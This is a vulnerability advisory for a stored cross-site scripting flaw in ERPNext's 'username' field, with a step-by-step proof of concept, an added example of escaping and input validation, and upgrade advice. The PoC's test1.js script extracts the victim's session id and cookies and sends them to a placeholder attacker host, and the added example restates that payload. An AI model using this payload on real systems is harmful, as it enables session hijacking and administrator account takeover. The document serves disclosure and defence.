Mend Vulnerability Database
Date: June 22, 2022
Overview
ERPNext versions v12.0.9 through v13.0.3 are vulnerable to stored cross-site scripting (XSS) because user input is not validated properly. A low-privileged attacker can inject arbitrary script into input fields when editing their own profile.
Details
ERPNext is affected by a stored XSS vulnerability that allows low-privileged users to store malicious scripts in the 'username' field under 'My Settings'. Because the stored value is rendered back into the page without escaping, the script executes in the browser of any user who views it, including an administrator.
PoC Details
1. Log in to the application as a low-privileged user.
2. Open the settings menu in the navigation bar and select My Settings.
3. Enter the malicious script from the PoC code in the 'username' field and click Save. The payload references test1.js, which is served from the attacker's host in the next step.
4. Create a file named 'test1.js' with the content below and serve it over HTTP (for example with Python's built-in http.server module).
The content of the 'test1.js' file:
    var re = /"sid":\s*"[0-9a-zA-Z]+"/gm;                          // locate the "sid" entry in the page source
    var te = /[0-9a-zA-Z]+/gm;
    var getSID = (document.documentElement.innerHTML).match(re);   // array of matches, or null if absent
    getSID = getSID[0].split(':');                                 // ['"sid"', ' "<session id>"']
    getSID = getSID[1].match(te)[0];                               // the bare session id
    var url = 'http://[attacker-ip]:[attacker-port]/?sid=' + getSID;
    var script = document.createElement('script');
    script.src = url + '&details=' + encodeURIComponent(document.cookie);   // append the victim's cookies
    document.body.appendChild(script);                             // inserting the tag sends the request
5. In a separate browser session (for example an incognito window), log in to the ERPNext server as a high-privileged user. The stored username is rendered unescaped, so the victim's browser fetches and executes test1.js from the attacker's server.
6. Once the script runs in the administrator's session, the 'sid' session identifier (together with the cookies) is sent to the attacker, who can use it to log in as Administrator.
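The rendering pattern behind the vulnerability described in Details, the escaped and validated alternative, and what test1.js does once it runs in the victim's browser, as an added example. This is not ERPNext's or Frappe's own code: the function names, the username payload, the allowed-character rule in isValidUsername and the SAMPLE_PAGE fragment are all constructed for the example.

```javascript
// Added example (not ERPNext's own code): the rendering pattern behind a stored
// XSS, the escaped alternative, and what the PoC's test1.js does once it runs.
// All names, the username payload and SAMPLE_PAGE below are constructed here.

// Stand-in for a stored 'username' value chosen by a low-privileged user. The
// attacker host and port are placeholders, as in the advisory's PoC.
const PAYLOAD = '<script src="http://[attacker-ip]:[attacker-port]/test1.js"></script>';

// Vulnerable pattern: the stored value is interpolated straight into page HTML,
// so a username containing markup becomes markup in every viewer's browser.
function renderUsernameUnsafe(username) {
  return '<span class="user-name">' + username + '</span>';
}

// Output encoding: every character that can open or close HTML syntax is
// replaced by its entity, so the stored value is displayed as text only.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderUsernameSafe(username) {
  return '<span class="user-name">' + escapeHtml(username) + '</span>';
}

// Server-side input validation is the second layer: a username has no business
// containing markup characters. The allowed set here is an assumption made for
// this example, not ERPNext's actual rule.
function isValidUsername(username) {
  return /^[A-Za-z0-9._-]{1,64}$/.test(username);
}

// What test1.js does in the victim's browser: search the page source for a
// "sid" value and return it. Returns null when no such value is present.
function extractSid(html) {
  const m = html.match(/"sid":\s*"([0-9a-zA-Z]+)"/);
  return m ? m[1] : null;
}

// Constructed page fragment standing in for a page that embeds the session id
// and also renders the attacker's stored username unescaped.
const SAMPLE_PAGE =
  '<html><body><script>frappe.boot = {"sid": "a1B2c3D4e5", "user": "Administrator"};' +
  '</script>' + renderUsernameUnsafe(PAYLOAD) + '</body></html>';

// Demonstration when run directly (node example.js).
console.log('unsafe :', renderUsernameUnsafe(PAYLOAD));
console.log('safe   :', renderUsernameSafe(PAYLOAD));
console.log('valid? :', isValidUsername(PAYLOAD), isValidUsername('jdoe'));
console.log('sid    :', extractSid(SAMPLE_PAGE));
```

The two defences are independent: escaping on output stops the stored value from ever becoming markup, and validating on input keeps markup out of the database in the first place. The extractSid function shows why the advisory rates the impact as full account takeover: the session id the PoC needs is readable from the page source once any script runs in the administrator's session.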
Affected Environments
ERPNext versions v12.0.9 through v13.0.3
Prevention
Upgrade to ERPNext version 13.1.0 (or later).
Good to know:

CVSS v3 base metrics
  Attack Vector (AV):        Network
  Attack Complexity (AC):    Low
  Privileges Required (PR):  Low
  User Interaction (UI):     Required

CVSS v2 base metrics
  Access Vector (AV):        Network
  Access Complexity (AC):    Medium